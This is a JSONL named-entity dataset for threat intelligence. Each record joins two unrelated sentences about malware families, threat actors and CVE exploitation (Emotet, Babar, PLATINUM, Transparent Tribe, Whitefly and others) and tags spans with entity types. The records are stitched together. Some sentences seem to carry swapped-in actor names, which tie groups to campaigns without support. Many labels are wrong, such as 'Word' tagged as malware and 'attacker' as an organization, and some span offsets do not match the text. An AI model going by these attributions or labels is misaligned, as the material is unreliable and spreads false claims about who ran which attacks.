{"text": "Now that specific Babar samples have been identified and analyzed , there might be new information , also with regards to similarities or differences between the two Remote Administration Tools ( RATs ) EvilBunny and Babar . The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME .", "spans": [{"start": 18, "end": 31, "label": "System"}, {"start": 166, "end": 193, "label": "System"}, {"start": 196, "end": 200, "label": "System"}, {"start": 203, "end": 212, "label": "System"}, {"start": 217, "end": 222, "label": "System"}, {"start": 237, "end": 254, "label": "Indicator"}, {"start": 305, "end": 318, "label": "Vulnerability"}, {"start": 424, "end": 431, "label": "Indicator"}]}
{"text": "We recommend reading Marion 's report \" Shooting Elephants \" , a complementary piece of work regarding the Babar malware . This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx .", "spans": [{"start": 107, "end": 120, "label": "System"}, {"start": 172, "end": 208, "label": "Indicator"}]}
{"text": "And finally , as every elephant , Babar has big ears and the malware is able to listen to conversations and log them by using the dsound and winmm libraries . It is possible that CVE-2017-8759 was being used by additional actors .", "spans": [{"start": 34, "end": 39, "label": "System"}, {"start": 130, "end": 136, "label": "System"}, {"start": 141, "end": 156, "label": "System"}, {"start": 179, "end": 192, "label": "Vulnerability"}, {"start": 222, "end": 228, "label": "Organization"}]}
{"text": "The G DATA SecurityLabs are convinced that the number of similarities identified between EvilBunny and Babar show that both malware families originate from the same developers . The addition of the EternalBlue exploit to Metasploit has made it easy for threat actors to exploit these vulnerabilities .", "spans": [{"start": 4, "end": 23, "label": "Organization"}, {"start": 89, "end": 98, "label": "System"}, {"start": 103, "end": 108, "label": "System"}, {"start": 198, "end": 209, "label": "Vulnerability"}, {"start": 210, "end": 217, "label": "Vulnerability"}, {"start": 221, "end": 231, "label": "Malware"}, {"start": 260, "end": 266, "label": "Organization"}, {"start": 270, "end": 277, "label": "Vulnerability"}]}
{"text": "TA542 , the primary actor behind Emotet , is known for the development of lures and malicious mail specific to given regions . The Magnitude EK landing page consisted of CVE-2016-0189 , which was first reported by FireEye as being used in Neutrino Exploit Kit after it was patched .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 33, "end": 39, "label": "System"}, {"start": 131, "end": 143, "label": "Malware"}, {"start": 170, "end": 183, "label": "Vulnerability"}, {"start": 214, "end": 221, "label": "Organization"}, {"start": 239, "end": 259, "label": "Malware"}]}
{"text": "While discussions of threats in this region often focus on \" North America \" generally or just the United States , nearly 100 campaigns during this period were either specifically targeted at Canadian organizations or were customized for Canadian audiences . The malware leverages an exploit , codenamed EternalBlue , that was released by the Shadow Brokers on April 14 , 2017 .", "spans": [{"start": 247, "end": 256, "label": "Organization"}, {"start": 284, "end": 291, "label": "Vulnerability"}, {"start": 304, "end": 315, "label": "Vulnerability"}, {"start": 343, "end": 357, "label": "Organization"}]}
{"text": "Emotet is a type of general-purpose malware that evolved from a well-known banking Trojan , \" Cridex \" , which was first discovered in 2014 . Some hackers even went onto use the Cisco exploits in the wild .", "spans": [{"start": 0, "end": 6, "label": "System"}, {"start": 75, "end": 89, "label": "System"}, {"start": 94, "end": 100, "label": "System"}, {"start": 178, "end": 183, "label": "Organization"}, {"start": 184, "end": 192, "label": "Vulnerability"}]}
{"text": "While discussions of threats in this region often focus on \" North America \" generally or just the United States , nearly 100 campaigns during this period were either specifically targeted at Canadian organizations or were customized for Canadian audiences . DanderSpritz is the framework for controlling infected machines , different from FuZZbuNch as the latter provides a limited toolkit for the post-exploitation stage with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar .", "spans": [{"start": 247, "end": 256, "label": "Organization"}, {"start": 259, "end": 271, "label": "Malware"}, {"start": 340, "end": 349, "label": "Malware"}, {"start": 455, "end": 470, "label": "Malware"}, {"start": 475, "end": 489, "label": "Malware"}, {"start": 494, "end": 504, "label": "Malware"}]}
{"text": "Emotet activity in 2019 included several high-volume campaigns that collectively distributed tens of millions of messages primarily targeting the manufacturing and healthcare industries . In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server .", "spans": [{"start": 146, "end": 159, "label": "Organization"}, {"start": 164, "end": 185, "label": "Organization"}, {"start": 234, "end": 248, "label": "System"}, {"start": 249, "end": 256, "label": "Vulnerability"}, {"start": 326, "end": 339, "label": "System"}]}
{"text": "Originally targeting Western European banks , Emotet has since been developed into a robust global botnet that is comprised of several modules , each of which equips Emotet with different spamming , email logging , information stealing , bank fraud , downloading , and DDoS , among others . On the other hand , ShadowBrokers group made headlines in 2016 when it claimed to have robbed various exploitation tools used by the NSA including the notorious EternalBlue that was a vital component in the WannaCry ransomware campaign causing damages to systems worldwide .", "spans": [{"start": 38, "end": 43, "label": "Organization"}, {"start": 46, "end": 52, "label": "System"}, {"start": 166, "end": 172, "label": "System"}, {"start": 199, "end": 212, "label": "Malware"}, {"start": 215, "end": 235, "label": "Malware"}, {"start": 238, "end": 248, "label": "Malware"}, {"start": 251, "end": 262, "label": "Malware"}, {"start": 269, "end": 273, "label": "Malware"}, {"start": 424, "end": 427, "label": "Organization"}, {"start": 452, "end": 463, "label": "Vulnerability"}]}
{"text": "Originally targeting Western European banks , it has since been developed into a robust global botnet that is comprised of several modules , each of which equips Emotet with different spamming , email logging , information stealing , bank fraud , downloading , and DDoS , among others . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload .", "spans": [{"start": 38, "end": 43, "label": "Organization"}, {"start": 162, "end": 168, "label": "System"}, {"start": 195, "end": 208, "label": "Malware"}, {"start": 211, "end": 231, "label": "Malware"}, {"start": 234, "end": 244, "label": "Malware"}, {"start": 247, "end": 258, "label": "Malware"}, {"start": 265, "end": 269, "label": "Malware"}, {"start": 294, "end": 300, "label": "System"}, {"start": 315, "end": 335, "label": "Organization"}, {"start": 377, "end": 410, "label": "Indicator"}, {"start": 430, "end": 443, "label": "Vulnerability"}]}
{"text": "Beginning in mid-January 2019 , TA542 distributed millions of Emotet-laden emails in both English and German . Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word .", "spans": [{"start": 190, "end": 203, "label": "Vulnerability"}, {"start": 207, "end": 214, "label": "Vulnerability"}, {"start": 215, "end": 229, "label": "Indicator"}]}
{"text": "DanaBot is a Trojan that includes banking site web injections and stealer functions . According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 13, "end": 19, "label": "System"}, {"start": 34, "end": 61, "label": "Malware"}, {"start": 66, "end": 83, "label": "Malware"}, {"start": 103, "end": 116, "label": "Organization"}, {"start": 149, "end": 167, "label": "Organization"}, {"start": 187, "end": 193, "label": "System"}, {"start": 239, "end": 251, "label": "System"}, {"start": 252, "end": 265, "label": "Vulnerability"}]}
{"text": "Proofpoint researchers observed one DanaBot affiliate ( Affid 11 ) specifically targeting Canada with \" Canada Post \" themed lures between January 1 and May 1 , 2019 . In order to carry out this operation , it uses publicly available tools , including Mimikatz ( Hacktool.Mimikatz ) and an open-source tool that exploits a known Windows privilege escalation vulnerability ( CVE-2016-0051 ) on unpatched computers .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 36, "end": 43, "label": "System"}, {"start": 104, "end": 115, "label": "Organization"}, {"start": 215, "end": 239, "label": "Malware"}, {"start": 252, "end": 260, "label": "Malware"}, {"start": 263, "end": 280, "label": "Malware"}, {"start": 329, "end": 336, "label": "System"}, {"start": 374, "end": 387, "label": "Vulnerability"}]}
{"text": "FormBook is a browser form stealer/keylogger that is under active development . Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 27, "end": 44, "label": "System"}, {"start": 134, "end": 144, "label": "Malware"}, {"start": 165, "end": 178, "label": "Indicator"}, {"start": 195, "end": 202, "label": "Vulnerability"}, {"start": 203, "end": 216, "label": "Vulnerability"}, {"start": 219, "end": 236, "label": "System"}]}
{"text": "While Canada-targeted threats are not new , Emotet in particular , with its frequent region-specific email campaigns , is bringing new attention to geo-targeting in Canada and beyond . The Word document usually exploits CVE-2012-0158 .", "spans": [{"start": 44, "end": 50, "label": "System"}, {"start": 189, "end": 193, "label": "System"}, {"start": 220, "end": 233, "label": "Vulnerability"}]}
{"text": "First observed in mid-2014 , this malware shared code with the Bugat ( aka Feodo ) banking Trojan . Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 .", "spans": [{"start": 63, "end": 68, "label": "Malware"}, {"start": 83, "end": 97, "label": "System"}, {"start": 114, "end": 123, "label": "Organization"}, {"start": 132, "end": 154, "label": "Indicator"}, {"start": 180, "end": 193, "label": "Vulnerability"}]}
{"text": "MUMMY SPIDER is a criminal entity linked to the core development of the malware most commonly known as Emotet or Geodo . Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 103, "end": 109, "label": "System"}, {"start": 113, "end": 118, "label": "System"}, {"start": 131, "end": 140, "label": "Organization"}, {"start": 149, "end": 171, "label": "Indicator"}, {"start": 197, "end": 210, "label": "Vulnerability"}]}
{"text": "After a 10 month hiatus , MUMMY SPIDER returned Emotet to operation in December 2016 but the latest variant is not deploying a banking Trojan module with web injects , it is currently acting as a ' loader ' delivering other malware packages . The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities .", "spans": [{"start": 26, "end": 38, "label": "Organization"}, {"start": 48, "end": 54, "label": "System"}, {"start": 127, "end": 141, "label": "System"}, {"start": 272, "end": 279, "label": "Organization"}, {"start": 352, "end": 361, "label": "Indicator"}, {"start": 376, "end": 389, "label": "Vulnerability"}, {"start": 394, "end": 407, "label": "Vulnerability"}]}
{"text": "The malware is also issuing commands to download and execute other malware families such as the banking Trojans Dridex and Qakbot . One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) .", "spans": [{"start": 96, "end": 118, "label": "System"}, {"start": 123, "end": 129, "label": "System"}, {"start": 172, "end": 189, "label": "Organization"}, {"start": 218, "end": 248, "label": "Indicator"}, {"start": 291, "end": 304, "label": "Vulnerability"}]}
{"text": "It seems that the main objective of the attackers was information gathering from the infected computers . The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components .", "spans": [{"start": 152, "end": 167, "label": "Malware"}, {"start": 182, "end": 197, "label": "Indicator"}, {"start": 282, "end": 289, "label": "System"}, {"start": 309, "end": 322, "label": "Vulnerability"}]}
{"text": "For the TeamViewer-based activities , we have traces in the past until September 2012 . The document files exploit at least three known vulnerabilities in Microsoft Office , which we discuss in the Infection Techniques section .", "spans": [{"start": 92, "end": 106, "label": "Indicator"}, {"start": 107, "end": 114, "label": "Vulnerability"}, {"start": 136, "end": 151, "label": "Vulnerability"}, {"start": 155, "end": 164, "label": "Organization"}]}
{"text": "In the actual targeted attack detected by the Hungarian National Security Agency , TeamSpy used components of the TeamViewer tool combined with other malware modules . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload .", "spans": [{"start": 114, "end": 129, "label": "System"}, {"start": 150, "end": 165, "label": "System"}, {"start": 175, "end": 181, "label": "System"}, {"start": 196, "end": 216, "label": "Organization"}, {"start": 258, "end": 291, "label": "Indicator"}, {"start": 311, "end": 324, "label": "Vulnerability"}]}
{"text": "In the actual targeted attack detected by the Hungarian National Security Agency , they used components of the TeamViewer tool combined with other malware modules . According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability .", "spans": [{"start": 111, "end": 126, "label": "System"}, {"start": 147, "end": 162, "label": "System"}, {"start": 182, "end": 195, "label": "Organization"}, {"start": 228, "end": 246, "label": "Organization"}, {"start": 266, "end": 272, "label": "System"}, {"start": 318, "end": 330, "label": "System"}, {"start": 331, "end": 344, "label": "Vulnerability"}]}
{"text": "TeamViewer has also been used in the \" Sheldor \" attack campaign , which was detected between 2010 and 2011 , and which resulted in assets stolen at the value of $600k and $832k . PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat .", "spans": [{"start": 0, "end": 10, "label": "System"}, {"start": 180, "end": 188, "label": "Organization"}, {"start": 262, "end": 282, "label": "Organization"}, {"start": 323, "end": 331, "label": "Vulnerability"}]}
{"text": "This match shows a direct relationship between Sheldor and TeamSpy , although we do not known if the connection is only at the tool level or at the operation level too . The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat .", "spans": [{"start": 253, "end": 273, "label": "Organization"}, {"start": 314, "end": 322, "label": "Vulnerability"}]}
{"text": "Microsoft Threat Intelligence refers to the activity group behind these attacks as TERBIUM , following our internal practice of assigning rogue actors chemical element names . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers .", "spans": [{"start": 0, "end": 29, "label": "Organization"}, {"start": 83, "end": 90, "label": "Organization"}, {"start": 196, "end": 204, "label": "Malware"}, {"start": 271, "end": 280, "label": "Organization"}, {"start": 321, "end": 339, "label": "Organization"}, {"start": 363, "end": 372, "label": "Organization"}]}
{"text": "From the samples we collected , we can conclude that the same threat actor produced many individual malware modules during the last ten years . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": [{"start": 100, "end": 115, "label": "System"}, {"start": 144, "end": 152, "label": "Malware"}, {"start": 220, "end": 228, "label": "Organization"}, {"start": 320, "end": 327, "label": "Malware"}]}
{"text": "Once TERBIUM has a foothold in the organization , its infection chain starts by writing an executable file to disk that contains all the components required to carry out the data-wiping operation . However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers .", "spans": [{"start": 5, "end": 12, "label": "Organization"}, {"start": 248, "end": 252, "label": "Organization"}, {"start": 286, "end": 294, "label": "Malware"}, {"start": 324, "end": 333, "label": "Organization"}]}
{"text": "Microsoft Threat Intelligence has observed that the malware used by TERBIUM , dubbed \" Depriz \" by Microsoft , reuses several components and techniques seen in the 2012 attacks , and has been highly customized for each targeted organization . PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 .", "spans": [{"start": 0, "end": 29, "label": "Organization"}, {"start": 68, "end": 75, "label": "Organization"}, {"start": 87, "end": 93, "label": "Organization"}, {"start": 99, "end": 108, "label": "Organization"}, {"start": 243, "end": 247, "label": "Malware"}, {"start": 321, "end": 336, "label": "Organization"}, {"start": 339, "end": 358, "label": "Organization"}, {"start": 361, "end": 380, "label": "Organization"}, {"start": 451, "end": 460, "label": "Organization"}, {"start": 468, "end": 476, "label": "Vulnerability"}, {"start": 509, "end": 513, "label": "Malware"}]}
{"text": "Note : TERBIUM establishes a foothold throughout the organization and does not proceed with the destructive wiping operation until a specific date/time : November 17 , 2016 at 8:45 p.m . Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) .", "spans": [{"start": 7, "end": 14, "label": "Organization"}, {"start": 241, "end": 251, "label": "Malware"}, {"start": 272, "end": 285, "label": "Indicator"}, {"start": 302, "end": 309, "label": "Vulnerability"}, {"start": 310, "end": 323, "label": "Vulnerability"}, {"start": 326, "end": 343, "label": "System"}]}
{"text": "Transparent Tribe has been active for several years and conducting suspected intelligence collection operations against South Asian political and military targets . The Word document usually exploits CVE-2012-0158 .", "spans": [{"start": 132, "end": 162, "label": "Organization"}, {"start": 169, "end": 173, "label": "System"}, {"start": 200, "end": 213, "label": "Vulnerability"}]}
{"text": "We initially reported on this threat group and their UPDATESEE malware in our FireEye Intelligence Center in February 2016 . Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 .", "spans": [{"start": 53, "end": 70, "label": "System"}, {"start": 78, "end": 98, "label": "Organization"}, {"start": 139, "end": 148, "label": "Organization"}, {"start": 157, "end": 179, "label": "Indicator"}, {"start": 205, "end": 218, "label": "Vulnerability"}]}
{"text": "We initially reported on Transparent Tribe and their UPDATESEE malware in our FireEye Intelligence Center in February 2016 . Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 .", "spans": [{"start": 53, "end": 70, "label": "System"}, {"start": 78, "end": 98, "label": "Organization"}, {"start": 135, "end": 144, "label": "Organization"}, {"start": 153, "end": 175, "label": "Indicator"}, {"start": 201, "end": 214, "label": "Vulnerability"}]}
{"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities .", "spans": [{"start": 28, "end": 48, "label": "Organization"}, {"start": 90, "end": 123, "label": "Malware"}, {"start": 143, "end": 156, "label": "Vulnerability"}, {"start": 230, "end": 237, "label": "Organization"}, {"start": 310, "end": 319, "label": "Indicator"}, {"start": 334, "end": 347, "label": "Vulnerability"}, {"start": 352, "end": 365, "label": "Vulnerability"}]}
{"text": "In this latest incident , the group registered a fake news domain , timesofindiaa.in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day . Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability , however in late January 2018 when , paradoxically , newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability .", "spans": [{"start": 163, "end": 183, "label": "Organization"}, {"start": 226, "end": 235, "label": "Organization"}, {"start": 251, "end": 264, "label": "Vulnerability"}, {"start": 398, "end": 411, "label": "Vulnerability"}]}
{"text": "Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word . PittyTiger has also been seen using Heartbleed vulnerability in order to directly get valid credentials .", "spans": [{"start": 79, "end": 92, "label": "Vulnerability"}, {"start": 104, "end": 118, "label": "Malware"}, {"start": 121, "end": 131, "label": "Organization"}, {"start": 157, "end": 181, "label": "Vulnerability"}]}
{"text": "In previous incidents involving this threat actor , we observed them using malicious documents hosted on websites about the Indian Army , instead of sending these documents directly as an email attachment . They have also been seen using Heartbleed vulnerability in order to directly get valid credentials .", "spans": [{"start": 124, "end": 135, "label": "Organization"}, {"start": 238, "end": 262, "label": "Vulnerability"}]}
{"text": "In this latest incident , Transparent Tribe registered a fake news domain , timesofindiaa.in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day . One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) .", "spans": [{"start": 171, "end": 191, "label": "Organization"}, {"start": 250, "end": 267, "label": "Organization"}, {"start": 296, "end": 326, "label": "Indicator"}, {"start": 369, "end": 382, "label": "Vulnerability"}]}
{"text": "This exploit file made use of the same shellcode that we have observed Transparent Tribe use across a number of spear phishing incidents . PittyTiger could also use CVE-2014-1761 , which is more recent .", "spans": [{"start": 139, "end": 149, "label": "Organization"}, {"start": 165, "end": 178, "label": "Vulnerability"}]}
{"text": "The first time this happened was at the beginning of the month , when Proofpoint researchers blew the lid off a cyber-espionage campaign named Operation Transparent Tribe , which targeted the Indian embassies in Saudi Arabia and Kazakhstan . PLATINUM is known to have used a number of zero-day exploits , for which no security update is available at the time of transmission , in these attempts .", "spans": [{"start": 70, "end": 80, "label": "Organization"}, {"start": 199, "end": 208, "label": "Organization"}, {"start": 242, "end": 250, "label": "Organization"}, {"start": 285, "end": 293, "label": "Vulnerability"}]}
{"text": "Back in February 2016 , Indian army officials issued a warning against the usage of three apps , WeChat , SmeshApp , and Line , fearing that these apps collected too much information if installed on smartphones used by Indian army personnel . The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components .", "spans": [{"start": 31, "end": 45, "label": "Organization"}, {"start": 97, "end": 103, "label": "System"}, {"start": 106, "end": 114, "label": "System"}, {"start": 121, "end": 125, "label": "System"}, {"start": 226, "end": 240, "label": "Organization"}, {"start": 289, "end": 304, "label": "Malware"}, {"start": 319, "end": 334, "label": "Indicator"}, {"start": 419, "end": 426, "label": "System"}, {"start": 446, "end": 459, "label": "Vulnerability"}]}
{"text": "The May 2018 adversary spotlight is on MYTHIC LEOPARD , a Pakistan-based adversary with operations likely located in Karachi . When the document was opened in Word , PLATINUM exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer .", "spans": [{"start": 39, "end": 53, "label": "Organization"}, {"start": 159, "end": 163, "label": "Malware"}, {"start": 166, "end": 174, "label": "Organization"}, {"start": 227, "end": 236, "label": "Organization"}, {"start": 280, "end": 293, "label": "Vulnerability"}, {"start": 327, "end": 335, "label": "Organization"}]}
{"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . The DLL exploited another previously unknown vulnerability ( designated CVE-2015-2546 ) in the Windows kernel , which enabled it to elevate privileges for the Word executable and subsequently install a backdoor through the application .", "spans": [{"start": 17, "end": 30, "label": "Organization"}, {"start": 63, "end": 81, "label": "Organization"}, {"start": 153, "end": 179, "label": "Vulnerability"}, {"start": 186, "end": 189, "label": "Malware"}, {"start": 254, "end": 267, "label": "Vulnerability"}, {"start": 277, "end": 284, "label": "System"}, {"start": 341, "end": 345, "label": "Malware"}]}
{"text": "The CrowdStrike Falcon Intelligence\u2122 team 's tracking of MYTHIC LEOPARD began in late 2016 , when evidence of an attack surfaced against a victim based in India and working in the hospitality sector . When the document was opened in Word , it exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer .", "spans": [{"start": 4, "end": 36, "label": "Organization"}, {"start": 180, "end": 198, "label": "Organization"}, {"start": 233, "end": 237, "label": "Malware"}, {"start": 295, "end": 304, "label": "Organization"}, {"start": 348, "end": 361, "label": "Vulnerability"}, {"start": 395, "end": 403, "label": "Organization"}]}
{"text": "Two binder tools \u2014 used to disguise custom executables as legitimate Microsoft implants \u2014 were discovered by Falcon Intelligence and linked to MYTHIC LEOPARD in July 2017 . In total , PLATINUM made use of four zero-day exploits during these two attack campaigns ( two remote code execution bugs , one privilege escalation , and one information disclosure ) , showing an ability to spend a non-trivial amount of resources to either acquire professionally written zero-day exploits from unknown markets , or research and utilize the zero-day exploits themselves .", "spans": [{"start": 27, "end": 54, "label": "Malware"}, {"start": 69, "end": 78, "label": "Organization"}, {"start": 109, "end": 128, "label": "Organization"}, {"start": 143, "end": 157, "label": "Organization"}, {"start": 184, "end": 192, "label": "Organization"}, {"start": 210, "end": 218, "label": "Vulnerability"}, {"start": 462, "end": 470, "label": "Vulnerability"}, {"start": 531, "end": 539, "label": "Vulnerability"}]}
{"text": "Falcon Intelligence has observed MYTHIC LEOPARD using this technique for several years to install multiple first-stage implants and downloaders , including the isqlmanager and Waizsar RAT malware families . PLATINUM has used several zero-day exploits against their victims .", "spans": [{"start": 0, "end": 19, "label": "Organization"}, {"start": 33, "end": 47, "label": "Organization"}, {"start": 160, "end": 171, "label": "System"}, {"start": 176, "end": 204, "label": "System"}, {"start": 207, "end": 215, "label": "Organization"}, {"start": 233, "end": 241, "label": "Vulnerability"}]}
{"text": "Patchwork also uses the Delphi file stealer as a similarity with Urpage , which suggests the three groups are somehow related . Even if CVE-2015-2546 affected Windows 10 , the exploitation would have required much more technical prowess to succeed ; ultimately , SMEP makes it more difficult for attackers .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 136, "end": 149, "label": "Vulnerability"}, {"start": 159, "end": 166, "label": "System"}, {"start": 296, "end": 305, "label": "Organization"}]}
{"text": "Patchwork has also recently employed Android malware in its attacks , with its use of a customized version of AndroRAT . For example , one zero-day vulnerability exploit ( CVE-2015-2545 ) used by PLATINUM was addressed immediately in September 2015 .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 37, "end": 52, "label": "System"}, {"start": 110, "end": 118, "label": "System"}, {"start": 139, "end": 147, "label": "Vulnerability"}, {"start": 162, "end": 169, "label": "Vulnerability"}, {"start": 172, "end": 185, "label": "Vulnerability"}, {"start": 196, "end": 204, "label": "Organization"}]}
{"text": "Trend Micro 's Mobile App Reputation Service ( MARS ) covers Android and iOS threats using leading sandbox and machine learning technologies . It possesses a wide range of technical exploitation capabilities , significant resources for researching or purchasing complicated zero-day exploits , the ability to sustain persistence across victim networks for years , and the manpower to develop and maintain a large number of tools to use within unique victim networks .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 91, "end": 106, "label": "System"}, {"start": 111, "end": 140, "label": "System"}, {"start": 172, "end": 207, "label": "Malware"}, {"start": 274, "end": 282, "label": "Vulnerability"}]}
{"text": "Symantec researchers have discovered that this attack group , which we call Whitefly , has been operating since at least 2017 , has targeted organizations based mostly in Singapore across a wide variety of sectors , and is primarily interested in stealing large amounts of sensitive information . In 2016 , an attack campaign by this group was recorded in early May that made use of an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player , which at the time was both unknown and unpatched .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 76, "end": 84, "label": "Organization"}, {"start": 386, "end": 393, "label": "Vulnerability"}, {"start": 398, "end": 411, "label": "Vulnerability"}, {"start": 439, "end": 444, "label": "System"}]}
{"text": "Whitefly compromises its victims using custom malware alongside open-source hacking tools and living off the land tactics , such as malicious PowerShell scripts . To deliver the malware to the victim machines , the Rocke group exploits vulnerabilities in Apache Struts 2 , Oracle WebLogic , and Adobe ColdFusion .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 142, "end": 160, "label": "System"}, {"start": 215, "end": 220, "label": "Organization"}, {"start": 236, "end": 251, "label": "Vulnerability"}, {"start": 273, "end": 288, "label": "System"}, {"start": 295, "end": 311, "label": "System"}]}
{"text": "From mid-2017 to mid-2018 , Whitefly launched targeted attacks against multiple organizations . However , around a month ago , Rocke started targeting systems that run Jenkins by attempting to exploit CVE-2018-1000861 and CVE-2019-1003000 .", "spans": [{"start": 28, "end": 36, "label": "Organization"}, {"start": 127, "end": 132, "label": "Organization"}, {"start": 193, "end": 200, "label": "Vulnerability"}, {"start": 201, "end": 217, "label": "Vulnerability"}, {"start": 222, "end": 238, "label": "Vulnerability"}]}
{"text": "While most of these organizations were based in Singapore , some were multinational organizations with a presence in Singapore . The Shadow Brokers first emerged in August , when they posted links to a selection of NSA exploits and hacking tools onto Github and other websites .", "spans": [{"start": 215, "end": 218, "label": "System"}, {"start": 219, "end": 227, "label": "Vulnerability"}]}
{"text": "To date , Whitefly has attacked organizations in the healthcare , media , telecommunications , and engineering sectors . In April , 2018 , the 360 Core Security takes the lead in capturing the APT-C-06 group\u2019s new APT attack using 0-day vulnerabilities CVE-2018-8174 in the wild .", "spans": [{"start": 10, "end": 18, "label": "Organization"}, {"start": 53, "end": 63, "label": "Organization"}, {"start": 66, "end": 71, "label": "Organization"}, {"start": 74, "end": 92, "label": "Organization"}, {"start": 99, "end": 118, "label": "Organization"}, {"start": 143, "end": 160, "label": "Organization"}, {"start": 193, "end": 201, "label": "Organization"}, {"start": 231, "end": 236, "label": "Vulnerability"}, {"start": 253, "end": 266, "label": "Vulnerability"}]}
{"text": "Whitefly first infects its victims using a dropper in the form of a malicious.exe or .dll file that is disguised as a document or image . The group has demonstrated access to zero-day vulnerabilities CVE-2018-0802 , and the ability to incorporate them into operations .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 43, "end": 50, "label": "System"}, {"start": 68, "end": 81, "label": "Malware"}, {"start": 85, "end": 94, "label": "Malware"}, {"start": 175, "end": 183, "label": "Vulnerability"}, {"start": 200, "end": 213, "label": "Vulnerability"}]}
{"text": "If opened , the dropper runs a loader known as Trojan.Vcrodat on the computer . FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017 .", "spans": [{"start": 16, "end": 23, "label": "System"}, {"start": 47, "end": 61, "label": "System"}, {"start": 80, "end": 87, "label": "Organization"}, {"start": 159, "end": 173, "label": "Vulnerability"}]}
{"text": "Whitefly has consistently used a technique known as search order hijacking to run Vcrodat . If the lateral movement with credentials fails , then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue , and uses it to spread to that host .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 52, "end": 74, "label": "System"}, {"start": 82, "end": 89, "label": "System"}, {"start": 163, "end": 182, "label": "Malware"}, {"start": 310, "end": 321, "label": "Vulnerability"}]}
{"text": "Once executed , Vcrodat loads an encrypted payload on to the victim 's computer . Tactic #1: Delivering the miner directly to a vulnerable serverSome tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1) , and executing it using ShellExecute() .", "spans": [{"start": 16, "end": 23, "label": "System"}, {"start": 192, "end": 206, "label": "Vulnerability"}, {"start": 220, "end": 230, "label": "Malware"}]}
